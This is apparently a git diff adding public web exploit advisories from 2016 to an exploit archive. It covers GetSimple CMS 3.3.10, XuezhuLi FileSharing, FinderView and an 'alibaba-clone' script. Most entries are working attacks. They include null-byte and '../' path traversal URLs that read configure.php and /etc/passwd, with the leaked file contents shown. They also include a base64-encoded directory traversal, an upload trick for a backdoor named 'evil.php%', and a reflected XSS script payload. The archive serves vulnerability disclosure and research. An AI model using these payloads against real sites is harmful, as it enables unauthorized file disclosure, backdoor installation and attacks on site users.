+# Vendor Homepage: http://alibaba-clone.com/
+# Version: All Versions
+# Tested on: CentOS and Windows
+
+Exploit :
+http://site/show_page.php?page=../[FilePath]%00
+
+Example :
+http://site/show_page.php?page=../configure.php%00
+
diff --git a/platforms/php/webapps/40008.txt b/platforms/php/webapps/40008.txt
new file mode 100755
index 000000000..810f72c9c
--- /dev/null
+++ b/platforms/php/webapps/40008.txt
@@ -0,0 +1,45 @@
+# Exploit Title: Getsimple CMS <= 3.3.10 Arbitrary File Upload Vulnerability
+# Google Dork: -
+# Date: 23/06/2016
+# Exploit Author: s0nk3y
+# Vendor Homepage: http://get-simple.info/
+# Category: webapps
+# Software Link: http://get-simple.info/data/uploads/releases/GetSimpleCMS-3.3.10.zip
+# Version: 3.3.10
+# Tested on: Ubuntu 16.04 / Mozilla Firefox
+# Twitter: http://twitter.com/s0nk3y
+# Linkedin: Rahmat Nurfauzi - http://linkedin.com/in/rahmatnurfauzi
+
+Description
+========================
+
+GetSimple CMS has been downloaded over 120,000 times (as of March 2013).
+The magazine t3n assigns GetSimple as "micro" and "Minimal-CMS" one, praises
+the simplicity yet possible extensibility through plug-ins.
+
+Vulnerability
+========================
+
+GetSimpleCMS Version 3.3.10 suffers from arbitrary file upload vulnerability
+which allows an attacker to upload a backdoor.
+
+This vulnerability is that the application uses a blacklist and whitelist
+technique to compare the file against mime types and extensions.
+
+Proof of Concept
+========================
+
+For exploiting this vulnerability we will create a file by adding the percent
+behind extension.
+1. evil.php% <--- this is simple trick :)
+
+2. An attacker login to the admin page and uploading the backdoor
+3. The uploaded file will be under the "/data/uploads/" folder
+
+Report Timeline
+========================
+2016-06-23 : Vulnerability reported to vendor
+2016-06-23 : Disclosure
\ No newline at end of file
diff --git a/platforms/php/webapps/40009.txt b/platforms/php/webapps/40009.txt
new file mode 100755
index 000000000..785565277
--- /dev/null
+++ b/platforms/php/webapps/40009.txt
@@ -0,0 +1,57 @@
+# Exploit Title: XuezhuLi FileSharing - Path Traversal Vulnerability
+# Date: 2016-06-23
+# Exploit Author: HaHwul
+# Exploit Author Blog: www.hahwul.com
+# Vendor Homepage: https://github.com/XuezhuLi
+# Software Link: https://github.com/XuezhuLi/FileSharing/archive/master.zip
+# Version: Latest commit
+# Tested on: Debian [wheezy]
+
+### Vulnerability
+ 1. download.php -> file_name parameter
+ 2. viewing.php -> file_name parameter
+
+### Vulnerability 1 - download.php
+GET /vul_test/FileSharing/download.php?file_name=../../../../../../../../../../../../../etc/passwd HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://127.0.0.1/vul_test/FileSharing/userpage.php
+Cookie: W2=dgf6v5tn2ea8uitvk98m2tfjl7; __utma=96992031.1679083892.1466384142.1466384142.1466398535.2; __utmz=96992031.1466384142.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __atuvc=1%7C25; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1466565345; bdshare_firstime=1466565462740; PHPSESSID=uetimns4scbtk46c8m6ab7upp1
+Connection: keep-alive
+
+HTTP/1.1 200 OK
+Date: Thu, 23 Jun 2016 06:17:58 GMT
+..snip..
+Content-Type: application/octet-stream + + +root:x:0:0:root:/root:/bin/bash +daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin +bin:x:2:2:bin:/bin:/usr/sbin/nologin +sys:x:3:3:sys:/dev:/usr/sbin/nologin +sync:x:4:65534:sync:/bin:/bin/sync + +# ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- +### Vulnerability 2 - viewing.php +GET /vul_test/FileSharing/viewing.php?file_name=../../../../../../../../../../../../../etc/passwd HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://127.0.0.1/vul_test/FileSharing/userpage.php +Cookie: W2=dgf6v5tn2ea8uitvk98m2tfjl7; __utma=96992031.1679083892.1466384142.1466384142.1466398535.2; __utmz=96992031.1466384142.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __atuvc=1%7C25; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1466565345; bdshare_firstime=1466565462740; PHPSESSID=uetimns4scbtk46c8m6ab7upp1 +Connection: keep-alive + +HTTP/1.1 200 OK +Date: Thu, 23 Jun 2016 06:19:49 GMT +Server: Apache/2.4.10 (Ubuntu) +..snip.. +Content-Type: text/plain;charset=UTF-8 + +root:x:0:0:root:/root:/bin/bash +daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin +bin:x:2:2:bin:/bin:/usr/sbin/nologin diff --git a/platforms/php/webapps/40010.html b/platforms/php/webapps/40010.html new file mode 100755 index 000000000..dc424d04e --- /dev/null +++ b/platforms/php/webapps/40010.html @@ -0,0 +1,27 @@ + + +
+ + + + +
+
+
+
+
\ No newline at end of file
diff --git a/platforms/php/webapps/40011.txt b/platforms/php/webapps/40011.txt
new file mode 100755
index 000000000..231fe950d
--- /dev/null
+++ b/platforms/php/webapps/40011.txt
@@ -0,0 +1,23 @@
+# Exploit Title: FinderView - Multiple Vulnerability(Path Traversal/Reflected XSS)
+# Date: 2016-06-23
+# Exploit Author: HaHwul
+# Exploit Author Blog: www.hahwul.com
+# Vendor Homepage: https://github.com/proin/
+# Software Link: https://github.com/proin/FinderView/archive/master.zip
+# Version: Latest commit
+# Tested on: Debian [wheezy]
+
+### Vulnerability1 - Path Traversal(view directory)
+Request
+GET /vul_test/FinderView/api.php?callback=jQuery21107685743998649676_1466662516225&type=get&mode=0&folder=Li4vLi4vLi4vLi4vLi4vLi4vZXRjLw==&_=1466662516227 HTTP/1.1
+Host: 127.0.0.1
+..snip..
+Connection: keep-alive
+
+Response
+jQuery21107685743998649676_1466662516225([{"folders":[{"name":"backups","folderuri":"Li4vLi4vLi4vLi4vYmFja3Vwcw==","folderuri_nobase":"../../../../backups","size":"0.0 KB","date":"15 June 2016"},
+..snip..
+,{"name":"opt","folderuri":"Li4vLi4vLi4vLi4vb3B0","folderuri_nobase":"../../../../opt","size":"0.0 KB","date":"26 August 2015"},{"name":"run","folderuri":"Li4vLi4vLi4vLi4vcnVu","folderuri_nobase":"../../../../run","size":"0.0 KB","date":"23 June 2016"},{"name":"spool","folderuri":"Li4vLi4vLi4vLi4vc3Bvb2w=","folderuri_nobase":"../../../../spool","size":"0.0 KB","date":"26 August 2015"},{"name":"tmp","folderuri":"Li4vLi4vLi4vLi4vdG1w","folderuri_nobase":"../../../../tmp","size":"0.0 KB","date":"23 June 2016"},{"name":"www","folderuri":"Li4vLi4vLi4vLi4vd3d3","folderuri_nobase":"../../../../www","size":"0.0 KB","date":"22 January
+
+### Vulnerability2 - Reflected XSS
+http://127.0.0.1/vul_test/FinderView/api.php?callback=jQuery211027821724654516156_1466662510279}}1c027%3Cscript%3Ealert%281%29%3C%2fscript%3Ecf2ea&type=get&mode=0&_=1466662510280
diff --git a/platforms/php/webapps/9387.tx b/platforms/php/webapps/9387.txt
similarity index 100%
rename from platforms/php/webapps/9387.tx
rename to platforms/php/webapps/9387.txt
diff --git a/platforms/windows/dos/15444.zip b/platforms/windows/dos/15444.txt
similarity index 100%
rename from platforms/windows/dos/15444.zip
rename to platforms/windows/dos/15444.txt